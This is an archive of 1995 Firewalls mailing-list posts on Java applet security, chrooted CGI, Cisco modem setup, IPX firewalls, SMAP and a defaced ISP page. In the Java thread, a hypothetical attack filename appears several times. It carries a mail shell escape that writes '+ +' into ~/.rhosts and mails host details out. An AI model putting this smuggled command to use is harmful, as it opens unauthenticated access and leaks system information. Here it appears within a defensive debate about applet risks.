(A lot of sites do run this kind of reporting scheme, with a find piping into a mail.)

I would argue there are uncountable numbers of similar attacks. And yes, you can probably introduce some kind of virus through this scheme, if you want to.

Your concentration on virii is because you believe this is/was the main threat with Java. I don't think that is the main threat. I instead believe that Java might "complete some chains of small deficiencies", and it is general enough to do this in non-obvious ways.

And you reason about Java as a stand-alone thing. It is not, it is part of a complex ecology of tools, scripts, configurations and practices. Why do you assume an attacker will "play by the rules"?

| The Java language is *strongly* typed, unlike C or C++. It has *no*
| type loopholes unlike PASCAL, Modula-2, etc. The ability to create a
| pointer is a closely held capability. Only the runtime can create
| pointers (references in Java) and when created pointers are indelibly
| marked with their type. All casts are checked for typing violations.

I believe Java, and the Java team of course, is doing an excellent job. And immediately does the next security monster rear its ugly head. Not fair!
:-)

/Christian

From firewalls-owner Sat Sep 16 11:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29921 for firewalls-outgoing; Sat, 16 Sep 1995 11:11:35 -0700
Received: from beast.brainlink.com (beast.brainlink.com [199.184.242.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA29914 for ; Sat, 16 Sep 1995 11:11:30 -0700
Received: by beast.brainlink.com (4.1/20Jul95-BrainLINK International) id AA17083; Sat, 16 Sep 95 14:11:50 edt
Date: Sat, 16 Sep 1995 14:11:50 -0400 (edt)
From: root
To: long-morrow@cs.yale.edu
Cc: cosborn@bbn.com, jst10@octacon.co.uk, firewalls@greatcircle.com
Subject: Re: WWW - http - cgi_scripts
In-Reply-To: <199509151400.KAA20314@SPARKY.CF.CS.YALE.EDU>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 15 Sep 1995 long-morrow@CS.YALE.EDU wrote:

> It can be a pain (you have to make sure that anything that CGI programs needs --
> shared libraries, perl interpreter and library modules -- exists within the
> chroot()d hierarchy, but it should help to contain a CGI program gone haywire
> (or one that an external WWW user attempted to trick and hijack).
>
> We run a number of CGI programs in a chroot()d environment.
>
> - Morrow

Would you mind sharing what you needed to move to the chrooted environment to make CGI work??
========= << raj >> == http://www.brainlink.com/~frostbit/ ==============
frostbit@brainlink.com SYSADMIN: BrainLINK System
(718) 805-8868 // http://www.brainlink.com
GCS d++ H-- s+:+ !g p2 !au a- w+ v-* C++++ US++++ L++ P+++ E- N+ W--- M-- po Y+ t-- 5+++ j++ tv b+++ e++ u+ h++ f+ r++ n+ y+
============================================================================

From firewalls-owner Sat Sep 16 11:36:26 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00150 for firewalls-outgoing; Sat, 16 Sep 1995 11:26:15 -0700
Received: from utrecht.knoware.nl (utrecht.knoware.nl [193.78.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA00143 for ; Sat, 16 Sep 1995 11:26:05 -0700
Received: from csehost.knoware.nl (csehost.knoware.nl [193.78.123.240]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id UAA08017; Sat, 16 Sep 1995 20:23:56 +0200
Date: Sat, 16 Sep 1995 20:23:56 +0200
Message-Id: <199509161823.UAA08017@utrecht.knoware.nl>
X-Sender: njb@pop.knoware.nl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Sam Howard
From: njb@knoware.nl (Niels Bjergstrom)
Subject: Re: External Client Access Policy
Cc: firewalls@greatcircle.com
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sam Howard wrote:

>Does anyone have any "policy" statements that they'd be willing to share?
> We are looking to have people at our clients sign a "Network Access
>Agreement" stating things like: thou shalt not do bad things, etc, etc, but
>the verbiage on that is not anywhere near complete, so I thought I'd ask
>around for hints...anyone?

I recommend you acquire Charles Cresson Wood's book "Information Security Policies made Easy". It's sold by Baseline Software, info@baselinesoft.com. A quite inspiring piece of work. (I'm not affiliated with Baseline or mr. Wood - I just think the book is worth while).

Rgds,
Niels

--
-- Niels J Bjergstrom, Ph.D., m/ISACA Tel.
+31 70 362 2269 --
-- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 --
-- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 --
-- Netherlands Email: njb@csehost.knoware.nl --
-- PGP Public key available on request - please use when mailing vira --

From firewalls-owner Sat Sep 16 13:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA02597 for firewalls-outgoing; Sat, 16 Sep 1995 12:35:40 -0700
Received: from mentos.hgs.se (Mentos.HGS.SE [130.238.202.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA02590 for ; Sat, 16 Sep 1995 12:35:33 -0700
Received: (from claes@localhost) by mentos.hgs.se (8.6.12/8.6.9) id VAA24181; Sat, 16 Sep 1995 21:31:43 +0200
Date: Sat, 16 Sep 1995 21:31:42 +0200 (MET DST)
From: Claes Nygren
X-Sender: claes@mentos
To: mramirez@imparcial.com.mx
cc: firewalls@GreatCircle.COM
Subject: Re: Help with CISCO 2511
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote:

> I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX) .
> I'm having problems trying to configure the receiving modems to support
> 14,400 bps from the callers.
> Actually my users only can connect to the modems at 9600 bps, and the
> technical support from CISCO told me that I have to change my modems to
> 28,800 bps, that's the only way that my receiving modems can receive calls
> at 14,400 bps.
> It's true?? , because I think that is some problem with the configuration
> of the CISCO (in dedicated or interactive mode)
>

I think that if you don't set rxspeed and txspeed when configuring your lines on the cisco it will use 9600 as default value.
I have put these lines into our 516:

    line 2 14
     login tacacs
     modem ri-is-cd
     rxspeed 38400
     txspeed 38400
     flowcontrol hardware

Then I let the modems convert the linespeed.

------------------------------------------------------
Claes Nygren	Hogskolan Gavle-Sandviken	Tel +46 70 8200 803
claes@hgs.se	S-801 76 GAVLE, SWEDEN		Fax +46 26 648771
http://www.hgs.se/~claes

From firewalls-owner Sat Sep 16 13:30:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03375 for firewalls-outgoing; Sat, 16 Sep 1995 13:18:16 -0700
Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA03362 for ; Sat, 16 Sep 1995 13:18:09 -0700
Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id QAA06930; Sat, 16 Sep 1995 16:27:19 -0400
Received: from metis.milkyway.com (root@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id QAA00179 for ; Sat, 16 Sep 1995 16:14:46 -0400
Received: from metis.milkyway.com by metis.milkyway.com (8.6.9/BSDI-Client) id QAA19285; Sat, 16 Sep 1995 16:24:50 -0400
Message-Id: <199509162024.QAA19285@metis.milkyway.com>
X-Mailer: exmh version 1.6.1 5/23/95
X-Face: +o^+u7Z5}dB^gVlCgr.W/thrVG>63+@L&~6W3um$qzdHEf*o^b4g'.>AF*9jO,@sw.~gu*+ !Ld4U(yvY'QL7ZSB#r3zb[pTsR0K5ZHDs5.8'w.'$u(o;imk*Z-.g)V|2a-KM-waTKUvx'xM>xOlZL E=ghh49p2h$1`Vp&rOtYlnm{|ixN#45yL)*j$3>QbmWu-[)Nw;^P53@cMO[P#Q>k3Ut)?Vh^`IJYvB ZdB[z`5aM4Z"wW@l~~iWw0MY^%F$mP)~F\lBcgj`h^hOvIp<
X-Uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html
To: firewalls@greatcircle.com
Subject: Re: IPX firewall?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
References: <9509121928.AA01068@rapid.rssi.com>
Date: Sat, 16 Sep 1995 16:24:48 -0400
From: Michael Richardson
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[I'm not a Novell expert, so please excuse any imprecision]

In article <9509121928.AA01068@rapid.rssi.com>, Brad VanOrden wrote:
>It should be noted that this firewall will be between two internal
>Novell segments. If anyone knows of something that can help us,
>it will be greatly appreciated.

I'm still trying to figure out what an IPX firewall allows through it. I know what kind of services an IP firewall might pass through it. In generic terms:

a) resource locations (DNS)
b) email (SMTP)
c) network management (SNMP)
d) remote login (Telnet)
e) file transfer (FTP,HTTP,Gopher)
...

In the IPX world this might translate to:

a) Service Advertising Protocol (SAP)
b) BasicMHS appears to use network drives to exchange email. There appears to also be a protocol between client and server of some kind, but I didn't find any documentation on it. I presume that gateways between servers use something like X.400 or some such.
c) rconsole? Novell also seems to support some SNMP management of hubs via add-on packages. SNMP is a multi-transport protocol anyway.
d) This is not equal to "f:login" --- which is file sharing. rconsole is closer.
e) the only analogue to HTTP/gopher that I came across in one Novell book I have is "ElectroText" (help). It uses file sharing.
f) printing. Through a firewall? I still do not understand why...

Mostly, from what I can tell, everything really comes down to getting access to the right set of file systems. In IP, we'd talk about doing NFS through the firewall.

SAP filtering also sounds like it is something you want to do. And, based on the src/dest net/node/socket in the IPX packet that appears in the SAP info, you enable and disable rules. (You have to be dynamic I think).
An SPX layer gateway would work for some facilities, e.g: printing which is SPX (connected) rather than connectionless IPX.

I would dearly like to be educated on *what* kinds of things an IPX firewall has to provide to be useful to a customer.

From firewalls-owner Sat Sep 16 13:32:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03069 for firewalls-outgoing; Sat, 16 Sep 1995 13:04:00 -0700
Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA03062 for ; Sat, 16 Sep 1995 13:03:55 -0700
Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA26513; Sat, 16 Sep 1995 13:02:36 -0700
Received: from scndprsn.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA14434; Sat, 16 Sep 1995 02:20:16 -0700
Received: from pepper.Eng.Sun.COM by scndprsn.Eng.Sun.COM (5.x/SMI-SVR4) id AA18123; Sat, 16 Sep 1995 02:20:14 -0700
Received: by pepper.Eng.Sun.COM (5.x/SMI-SVR4) id AA21010; Sat, 16 Sep 1995 02:21:11 -0700
Date: Sat, 16 Sep 1995 02:21:11 -0700
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Message-Id: <9509160921.AA21010@pepper.Eng.Sun.COM>
To: cwe@Csli.Stanford.EDU
Subject: Re: I wish Java would go away ...
Cc: firewalls@GreatCircle.COM, kjj@pondscum.phx.mcd.mot.com.cmcmanis@Sun.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks for the great mail.

> But aren't you assuming people will follow the rules you've set up for
> this game? You say things like "in Java", and "impossible".

I try not to make this assumption. I try to assume that web browsing is a "given." That is that the user community has chosen to take on the risk of exposing themselves to net scams in the form of web pages.

> * It is not impossible given stupid users that disable your
> restrictive defaults, setting READPATH==WRITEPATH==everywhere?
> You leave a heavy burden on the security officer, since Java is
> so extensibly configurable.
> This might be the thing that tips the
> balance, so to say.

It is our goal to clearly and precisely enumerate the "knobs" available and as they relate to security. Since we understand the effect of the knobs on applet capabilities we can explain exactly what risks the user entails by setting them. We also provide a mechanism so that the security officer can disable the adjustment of any knobs, however that mechanism can be defeated by a power user who rebuilds the system from source. Any suggestions on how to prevent users from running applications on their nodes that they have constructed would be interesting.

> * you say "within JAVA", assuming somehow that _only Java will be
> used_ for a virus? there are plenty of other bits and pieces out
> there that together with Java might make up a virus. The problem of
> virii has changed somewhat, as is shown by the Word 6 virus. You
> are reasoning about virii on *one* level, the byte code level. But
> what about higher-level virii?

No, I say "within Java" because that is the change to the system. Presuming that you have some understanding of how secure your system is "before Java" then I can help you understand the impact of "after Java." No one in the Java group should claim that Java has any _immunization_ effect, only that it doesn't increase susceptibility. The bits and pieces that are there now are still there, waiting to be exploited. My favorite virus so far is the "don't read your mail because it can infect your system" virus which is entirely semantic based.

> * The messiness of it all. Java opens up a lot of unexpected
> information and modification pathways. These new changes might
> change the security analysis of *another* program in a significant
> way, that *together* might become a major security problem.

No, it doesn't.

> 1/ java applet downloaded, does something neat, and also at the same
> time deposits a file in the allowed file space, containing
> malicious data.
> Let's say that its filename is
>
> 'look \n
> ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org'
>
> (that was the filename.)

Cute but it doesn't fly. Since Applets cannot replace FileOutputStream (the only way to create a file on the host system) and FileOutputStream will in fact reject this "name" out of hand, but even if it didn't it would put up a dialog box that said, "This applet is trying to open '... ...' should this be allowed? Yes or No?" and the user will say "Gee that is a stupid filename, no way!"

> it also makes the file setuid/setgid or something like that.
> Something that will make most logging systems notice.

Java doesn't even come close to offering the ability to change protection bits.

> 2/ during the night the security audit starts, and walks through
> the file tree with something like this;
>
> find /home -perm 4000 -print | mail staff@$50.com
>
> This will generate perfectly legitimate input to the mail
> program.
>
> illegal file(s) found!
> Files:
> look
> ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org
>
> mail understands the ~! to be a shell escape, that is executed.
> The intruder will have a couple of hours before the admin reads
> this mail.

Again, doing strict vulnerability analysis on this attack requires that a) the applet can create a file with your bogus name, and b) the permissions can be diddled. Neither of which are possible and there is no mechanism for getting around this.

> I would argue there are uncountable numbers of similar attacks. And
> yes, you can probably introduce some kind of virus through this
> scheme, if you want to.

And I assert that it is fundamentally impossible to "damage" the users system in a meaningful way if all an applet can do is render pixels and play sounds.
(Actually I take that back. Consider the person who has in their office a PC with a voice input system, and our malicious user comes in, asks you to show how you can delete files by voice, and how you can open some other file by voice, which is covertly recorded and then digitized and spliced into a command to delete a critical control file; and when you visit their page an applet is loaded that blurts out of the speaker "Computer! Delete config.sys. Reboot!" in your voice.)

So now that you know it is _impossible_ to write a file from an applet without its name popping up in a dialog box (that the applet cannot prevent), and it is impossible to diddle with the permission bits, tell me how you can create a virus?

> Your concentration on virii is because you believe this is/was the
> main threat with Java. I don't think that is the main threat. I
> instead believe that Java might "complete some chains of small
> deficiencies", and it is general enough to do this in non-obvious
> ways.

Actually, virii are simply popular with the press; they are not a threat with Java. The _real_ threats are preventing applets from getting information from inside the firewall and exporting it outside (or even to a confederate inside). Here the defenses get much more interesting, especially if you start from the position that the attacker already has control over your name server inside your firewall.

> And you reason about Java as a stand-alone thing. It is not, it is
> part of a complex ecology of tools, scripts, configurations and
> practices. Why do you assume an attacker will "play by the rules"?

On the contrary, I assume the attacker won't play by the rules, but by the same token, if I send mail to all of the users inside a firewall and say "We're rebuilding the password database, please send us your user name and password so that you will be able to log into your system after you reboot," a non-zero percentage will send me their passwords!
I can increase the odds by forging the mail from an operator alias. I want to make sure that Java won't make it any easier to make this attack than it is now. But I can't prevent it, simply not participate. I don't assume Java is standalone, but I do assume that most people will be simply browsing with it. I know how to crack systems, and I recognize that it is nearly impossible to think of something beyond one's own experience, so I encourage input like yours and others on the list.

> I believe Java, and the Java team of course, is doing an excellent
> job. And immediately does the next security monster rear its ugly
> head. Not fair! :-)

Thanks for the kudos (and your virii thoughts!) For those of you doing audits, you may wish to start by grepping for the word 'native' in the Java source hierarchy; this will give you a list of all files that transition out of Java's security domain. Take a look at what the methods do and how they are implemented. This will give you a rough cut at the risk vectors.
--Chuck McManis
Java guy

From firewalls-owner Sat Sep 16 14:30:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05121 for firewalls-outgoing; Sat, 16 Sep 1995 14:05:23 -0700
Received: from noc.tor.hookup.net (noc.tor.hookup.net [165.154.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05107 for ; Sat, 16 Sep 1995 14:05:18 -0700
Received: from taylor.tor.hookup.net (taylor.tor.hookup.net [165.154.8.92]) by noc.tor.hookup.net (8.7.Beta.14/1.483) with SMTP id RAA09247 for ; Sat, 16 Sep 1995 17:04:04 -0400 (EDT)
Date: Sat, 16 Sep 1995 17:04:04 -0400 (EDT)
Message-Id: <199509162104.RAA09247@noc.tor.hookup.net>
X-Sender: taylor@noc.tor.hookup.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: btaylor@integain.com (Bob Taylor)
Subject: IP Filtering under AIX
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings All,

I need to find an IP packet filter for AIX, capable of filtering based on protocol and port at least. The ability to filter based on source and destination address as well would be great. I have looked at ipfilter and screend, either of which would appear to do much of what I need, but neither of which is designed to compile under AIX - at least that I could find.

Ideally, the filter would be applied differently to the two interfaces of my host, or only applied to one interface. This is for an internal firewall rather than an internet firewall, so I don't really need all of the bells and whistles - just packet filtering.

Any suggestions would be greatly appreciated.

Regards,
Bob.
--------------------------------------------------------------------
Bob Taylor - Consultant - InteGain Corporation
Email: btaylor@integain.com    Voice: (416) 410-2628
--------------------------------------------------------------------

From firewalls-owner Sat Sep 16 16:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA07495 for firewalls-outgoing; Sat, 16 Sep 1995 15:37:08 -0700
Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA07488 for ; Sat, 16 Sep 1995 15:37:04 -0700
Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/3.1.090690-Ovid Technologies) id AA03066; Sat, 16 Sep 1995 16:33:07 -0600
Date: Sat, 16 Sep 1995 16:33:07 -0600 (MDT)
From: Adam Prato
To: mramirez@imparcial.com.mx, firewalls@greatcircle.com
Subject: Re: Help with CISCO 2511
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 15 Sep 1995, Adam Prato wrote:
>
>
> On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote:
>
> > I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX).
> > I'm having problems trying to configure the receiving modems to support
> > 14,400 bps from the callers.
> > Actually my users only can connect to the modems at 9600 bps, and the
> > technical support from CISCO told me that I have to change my modems to
> > 28,800 bps, that's the only way that my receiving modems can receive calls
> > at 14,400 bps.
> > Is it true?? , because I think that is some problem with the configuration
> > of the CISCO (in dedicated or interactive mode)
> >
> > Thanks..
>
> I don't think so.
> But try this
> 1) Make sure all dipswitch settings are correct for the modems
> 2) logon to router's console (not telnet) and enable privileged mode
> 3) config term
> 4) line 1 10
> 5) modem in out
> 6) ctrl-c (exit config-line)
> 7) telnet to the router at port 20xx - where the XX refers to the line of the
> modem, from 01 to 10.
> 8) issue the necessary AT commands to communicate with the modem. Configure
> the modem to autoanswer (ATS0=1) and any other modem settings (&c1&d3 so
> on soforth)
> 9) exit by pressing escape sequence. default on cisco is ctrl-shft-6-x
> 10) clear line XX where XX is the line you just configured
>
> that's it. logoff the router (ignore any errors about open connections) and
> dial in.
>
> Adam
>

I neglected to say:

11) config term, line 1 10, modem ri-is-cd to set the modems back.

Adam

From firewalls-owner Sat Sep 16 19:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA10076 for firewalls-outgoing; Sat, 16 Sep 1995 18:54:31 -0700
Received: from koromiko.off.connect.com.au (koromiko.off.connect.com.au [192.94.41.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA10069 for ; Sat, 16 Sep 1995 18:54:25 -0700
Received: (from csb@localhost) by koromiko.off.connect.com.au id LAA02463 (8.6.12/IDA-1.6); Sun, 17 Sep 1995 11:52:52 +1000
From: Craig Bishop
Message-ID: <199509170152.LAA02463@koromiko.off.connect.com.au>
Subject: Re: I wish Java would go away ...
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Sun, 17 Sep 1995 11:52:51 +1000 (EST)
Cc: cwe@Csli.Stanford.EDU, firewalls@GreatCircle.COM, kjj%pondscum.phx.mcd.mot.com.cmcmanis@Sun.COM
In-Reply-To: <9509160921.AA21010@pepper.Eng.Sun.COM> from "Chuck McManis" at Sep 16, 95 02:21:11 am
X-Mailer: ELM [version 2.4 PL21]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1318
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Chuck McManis writes:
>
> > 1/ java applet downloaded, does something neat, and also at the same
> > time deposits a file in the allowed file space, containing
> > malicious data. Let's say that its filename is
> >
> > 'look \n
> > ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org'
> >
> > (that was the filename.)
>
> Cute but it doesn't fly. Since Applets cannot replace FileOutputStream
> (the only way to create a file on the host system) and FileOutputStream
> will in fact reject this "name" out of hand, but even if it didn't
> it would put up a dialog box that said, "This applet is trying to open
> '... ...' should this be allowed? Yes or No?" and the
> user will say "Gee that is a stupid filename, no way!"

This is exactly the sort of problem which exists with Java and the HotJava browser. We the administrators want to set the policy for how Java and HotJava work and do not want the user to be able to override that policy. There is going to be one or more users who are more stupid than the filename. Allow a global configuration file which the user cannot circumvent and we are part way to solving many of the problems.
Cheers,
Craig

--
Craig Bishop - Internet Security Analyst
csb@connect.com.au
http://www.connect.com.au/people/csb/

From firewalls-owner Sat Sep 16 22:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12088 for firewalls-outgoing; Sat, 16 Sep 1995 21:32:26 -0700
Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA12077 for ; Sat, 16 Sep 1995 21:32:23 -0700
Received: by netcom10.netcom.com (8.6.12/Netcom) id VAA14885; Sat, 16 Sep 1995 21:28:10 -0700
Date: Sat, 16 Sep 1995 21:28:10 -0700 (PDT)
From: Michael Nelson
X-Sender: mikenel@netcom10
To: firewalls@greatcircle.com
Subject: What am I doing wrong with SMAP?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi...

I am trying to install SMAP from FWTK v1.3 in BSD/OS 2.0. However, I've run into a little snag. Every time I connect to port 25 (by hand), SMAP complains that it cannot chroot (into the syslog). /etc/inetd.conf is set to fire up SMAP as a root-owned process -- like the example config files show.

The error:

Sep 17 00:20:40 dreamland smap[2088]: fwtksyserr: cannot chroot to /var/spool/smap: Operation not permitted

I am stumped...

-- Mike

--
Michael Nelson (mikenel@netcom.com)   | Through the firewall, off the router,
Rockville, Maryland                   | over the ATM backbone, nothing but
BSD/OS, WinNT, OLE2 Development       | 'net.
From firewalls-owner Sat Sep 16 22:30:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA12956 for firewalls-outgoing; Sat, 16 Sep 1995 22:10:13 -0700
Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA12949 for ; Sat, 16 Sep 1995 22:10:10 -0700
Received: by netcom10.netcom.com (8.6.12/Netcom) id VAA18237; Sat, 16 Sep 1995 21:56:32 -0700
Date: Sat, 16 Sep 1995 21:56:31 -0700 (PDT)
From: Michael Nelson
X-Sender: mikenel@netcom10
To: firewalls@greatcircle.com
Subject: Figured out why SMAP wouldn't work on BSDI...
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Naturally I figure out why SMAP wouldn't chroot on BSDI after I post my message here :-).

If SMAP is compiled with the shared libraries, attempting to chroot results in an "Operation not permitted" error. I have gotten into the habit of modifying Makefiles to make programs compile with the shared libraries. This usually results in a dramatically smaller binary (hard disk space is a valuable resource here). It broke things in this case...

While putting the shared library in the "chroot'd" area might have worked, I have decided to keep it as simple as possible (hopefully simple==safer).

-- Mike

--
Michael Nelson (mikenel@netcom.com)   | Through the firewall, off the router,
Rockville, Maryland                   | over the ATM backbone, nothing but
BSD/OS, WinNT, OLE2 Development       | 'net.
From firewalls-owner Sun Sep 17 16:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA26591 for firewalls-outgoing; Sun, 17 Sep 1995 15:54:28 -0700
Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA26584 for ; Sun, 17 Sep 1995 15:54:24 -0700
Message-ID:
Date: 17 Sep 1995 18:53:16 U
From: "Gateway Server"
Subject: Undeliverable Mail
X-Mailer: Mail*Link SMTP-MS 3.0.2
Apparently-To:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V4 #531
Sent: Fri, Sep 15, 1995 6:52 PM
To: Harris Tom
On Server: PRC Bellevue NE MS
Date: Sun, Sep 17, 1995 6:53 PM
Reason: Could not be delivered because the destination Microsoft Mail server could not be found.

From firewalls-owner Sun Sep 17 19:00:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00475 for firewalls-outgoing; Sun, 17 Sep 1995 18:50:07 -0700
Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA00468 for ; Sun, 17 Sep 1995 18:50:04 -0700
Received: from histar2.ezunx.com by scruz.net (8.6.9/1.34) id SAA05070; Sun, 17 Sep 1995 18:47:37 -0700
Date: Sun, 17 Sep 95 12:16:10 PDT
From: Rich
Subject: Comments on a hacked server/page
To: webserver-nt@DELTA.PROCESS.COM, firewalls@greatcircle.com
X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc.
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thought I would throw this out for a bit of discussion...

Recently, a friend of mine who runs an IAP/ISP company (about 600 customers so far) was 'compromised' on an NT server for his home page.
(I did NOT set up his security/firewall, otherwise this would not have happened :-) )

At any rate, the gist of it was his home page was "altered" through a hole in the CERN server which ran on the outside. What was altered?? The prices for access to his services!!!!!

This might have gone on "undetected" for quite some time; however, he had to make a change to the page due to an AREA code change (sometimes the phone company can provide a real use) and he pulled the old one up to edit. He then noticed that the prices had been increased by $20-30 per month for dialup access and by almost $50 for ISDN, and I won't even mention the leased line prices, but they were HIGH!

What are the odds that the author checks all his/her pages often enough to catch something like this, and this brings to light a question....

How can you protect yourself from "altered" information? I mean what if someone had changed his page to load pornographic images or slanderous comments? Who is responsible? A tough call I know.

I am now checking my home pages at least weekly! (ALL OF THEM!)

cheers....

Rich Fitzgerald

p.s. the hole in the CERN server is now plugged... (we hope)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
** Remember -- Life is NOT a dress rehearsal!
(nor is it a small furry animal with funny feet and floppy ears...)
From firewalls-owner Sun Sep 17 19:32:49 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA01619 for firewalls-outgoing; Sun, 17 Sep 1995 19:30:46 -0700
Received: from wraith.internode.com.au (wraith.internode.com.au [192.83.231.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA01608 for ; Sun, 17 Sep 1995 19:30:41 -0700
Received: by wraith.internode.com.au (5.83--+1.3.1+0.50/UA-5.23) id AA05723; Mon, 18 Sep 1995 11:54:45 +0930
From: Simon Hackett
Message-Id: <9509180224.AA05723@wraith.internode.com.au>
Subject: Re: Comments on a hacked server/page
To: raf@ezunx.com (Rich)
Date: Mon, 18 Sep 95 11:54:44 CST
Cc: webserver-nt@DELTA.PROCESS.COM, firewalls@greatcircle.com, ross@rocksoft.com
In-Reply-To: ; from "Rich" at Sep 17, 95 12:16:10 pm
X-Mailer: ELM [version 2.4dev PL17]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Rich says:
> This might have gone on "undetected" for quite some time, however, he had to
> make a change to the page due to an AREA code change (sometimes the phone
> company can provide a real use) and he pulled the old one up to edit. He then
> noticed that the prices had been increased by $20-30 per month for dialup access
> and by almost $50 for isdn and I won't even mention the leased line prices, but
> they were HIGH!
>
> What are the odds that the author checks all his/her pages often enough to catch
> something like this, and this brings to light a question....
>
> How can you protect yourself from "altered" information? I mean what if someone
> had changed his page to load pornographic images or slanderous comments? Who is
> responsible? A tough call I know.
>
> I am now checking my home pages at least weekly! (ALL OF THEM!)

A company called Rocksoft makes a cryptographically secure data integrity checking product called Veracity which is ideal for this situation - you can run it on a regular (e.g. cron-driven) basis and it'll pinpoint exactly what's changed.
The "snapshot" file it creates and uses for subsequent checks is also internally cryptographically secure so it cannot itself be modified without detection.

Drop them a line (info@rocksoft.com) for more details. They'll also email you info on getting a free 30 day demo copy via the internet in response to email to demo@rocksoft.com.

Cheers,
Simon Hackett (a satisfied customer)

------------------------------------------------------------------------
"Simon Hackett, Internode Systems Pty Ltd"
Phone: +61 8 373 1020   Fax: +61 8 373 4911
